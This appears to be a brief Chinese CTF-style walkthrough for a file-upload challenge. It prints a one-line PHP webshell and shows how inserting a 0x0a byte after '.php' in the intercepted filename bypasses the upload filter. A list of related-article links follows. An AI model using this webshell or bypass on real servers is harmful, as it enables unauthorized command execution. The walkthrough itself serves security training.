Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
Gappsong87441 分钟前
【Linux学习】Linux安装并配置RedisFortinet_CHINA1 小时前
工业网络安全新范式——从风险可见性到量化防御的进化skywalk81632 小时前
2025年的前后端一体化CMS框架优选方案D-海漠2 小时前
Modbus_TCP_V4 客户端虚!!!看代码3 小时前
【Sentinel学习】Johny_Zhao3 小时前
Docker 一键安装部署 JumpServer 堡垒机liulilittle3 小时前
VGW 虚拟网关用户手册 (PPP PRIVATE NETWORK 基础设施)网硕互联的小客服3 小时前
服务器如何配置防火墙规则以阻止恶意流量和DDoS攻击?Qiq9223 小时前
怎么分析内网ipv6和ipv4流量占比?数通Dinner3 小时前
P/A初始化协商